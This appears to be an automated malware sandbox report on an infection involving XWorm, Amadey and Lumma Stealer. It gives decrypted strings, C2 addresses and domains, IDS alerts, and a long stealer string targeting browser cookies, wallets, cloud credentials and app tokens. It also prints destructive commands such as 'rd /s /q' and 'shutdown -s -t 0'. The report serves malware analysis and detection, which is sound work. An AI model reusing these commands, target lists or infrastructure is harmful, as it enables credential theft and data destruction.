Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: 91.212.166.99
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: 4404
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: %LocalAppData%
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	String decryptor: dllhost.exe

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe

Unpacked PE file: 36.2.crossplatformplayer.exe.400000.0.unpack

Source: 2E02vIiMfd.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1

Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:59827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:59836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:59861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:59710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:59729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:59741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:59821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:59824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.4:59842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:59852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:59853 version: TLS 1.2

Source:	Binary string: C:\AdminC4\Workspace\1654247295\Project\Debug\Project.pdb source: abd4306087.exe, 0000001C.00000000.2340682926.000000000127F000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: vdr1.pdb source: Appeal.com, 00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3739881642.0000000004FA1000.00000040.00001000.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2709605016.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2709470347.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: c3d996d758.exe, 00000007.00000002.2718587583.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, a58cbe76b9.exe, 00000020.00000002.3297242480.000000000A080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source:	Binary string: cryptosetup.pdbGCTL source: Appeal.com, 00000014.00000002.3672354873.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cryptosetup.pdb source: Appeal.com, 00000014.00000002.3672354873.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 1.pdb\ source: Appeal.com, 00000014.00000003.2709531843.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2706766000.0000000004D39000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: c3d996d758.exe, 00000007.00000002.2718587583.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, a58cbe76b9.exe, 00000020.00000002.3297242480.000000000A080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 1.pdb source: Appeal.com, 00000014.00000003.2709531843.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2706766000.0000000004D39000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: {"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWAR
Source:	Binary string: Excited.pdb source: 2328527160.exe, 00000016.00000000.2236560137.0000000000AC2000.00000002.00000001.01000000.0000000D.sdmp, 2328527160.exe, 00000016.00000002.2569687773.0000000003F19000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: ac911b4662.tmp, 00000026.00000003.2749097896.0000000003260000.00000004.00001000.00020000.00000000.sdmp, ac911b4662.tmp, 00000026.00000003.2752848082.0000000003598000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_00406301 FindFirstFileW,FindClose,	8_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_0047DC54
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0048A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0048A087
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0048A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0048A1E2
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	20_2_0047E472
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0048A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	20_2_0048A570
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0044C622 FindFirstFileExW,	20_2_0044C622
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004866DC FindFirstFileW,FindNextFileW,FindClose,	20_2_004866DC
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00487333 FindFirstFileW,FindClose,	20_2_00487333
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	20_2_004873D4
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_0047D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\567757	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\567757\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49740 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49742 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49748 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49867 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.4:50167 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.4:59816 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.4:54906 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.4:55922 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49926 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:55611 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.4:61436 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.4:63705 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.4:60379 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.4:50191 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.4:60124 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59823 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.4:58428 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059403 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (yuriy-gagarin .com) : 192.168.2.4:58459 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.4:59842 -> 104.21.29.142:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59835 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59848 -> 104.21.82.94:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:59849 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059053 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tawdrydadysz .icu) : 192.168.2.4:58807 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.4:63689 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.4:59816 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.4:59703 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.4:55804 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.4:64147 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.4:59446 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.4:50996 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.4:60427 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.4:63461 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059404 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI) : 192.168.2.4:59712 -> 104.21.82.94:443
